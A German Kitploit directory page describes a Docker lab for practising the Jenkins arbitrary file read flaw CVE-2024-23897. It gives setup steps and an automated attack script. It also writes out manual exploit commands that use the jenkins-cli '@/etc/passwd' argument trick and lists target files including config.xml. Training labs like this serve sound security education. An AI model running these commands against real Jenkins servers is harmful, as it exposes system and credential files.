Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Jenkins-CVE-2024-23897-Lab — Docker-basierte Laborumgebung zum Üben der Ausnutzung des beliebigen Dateilesens in Jenkins (CVE-2024-23897) mit automatisierten und manuellen Angriffsskripten. | Kitploit
Tools/GitHubGitHub/fineken/jenkins-cve-2024-23897-lab
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubfineken/jenkins-cve-2024-23897-lab

Jenkins-CVE-2024-23897-Lab

Docker-basierte Laborumgebung zum Üben der Ausnutzung des beliebigen Dateilesens in Jenkins (CVE-2024-23897) mit automatisierten und manuellen Angriffsskripten.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Jenkins CVE-2024-23897 Lab

Schwachstelle zum Lesen beliebiger Dateien in Jenkins 2.441 und früher.

Start

root@kitploit:~
docker-compose up -d

Automatischer Angriff

root@kitploit:~
docker exec -it attacker-host ./auto-exploit.sh

Manueller Angriff

root@kitploit:~
docker exec -it attacker-host bash
cd /tmp
curl -o jenkins-cli.jar http://vulnerable-jenkins:8080/jnlpJars/jenkins-cli.jar

# Erste Zeile der Datei
java -jar jenkins-cli.jar -s http://vulnerable-jenkins:8080/ -http help "@/etc/passwd"

# Vollständige Datei
java -jar jenkins-cli.jar -s http://vulnerable-jenkins:8080/ -http connect-node "@/etc/passwd"

Ziele

  • /etc/passwd
  • /opt/test-files/secret.txt
  • /var/jenkins_home/config.xml

Stopp

root@kitploit:~
docker-compose down
Tool herunterladen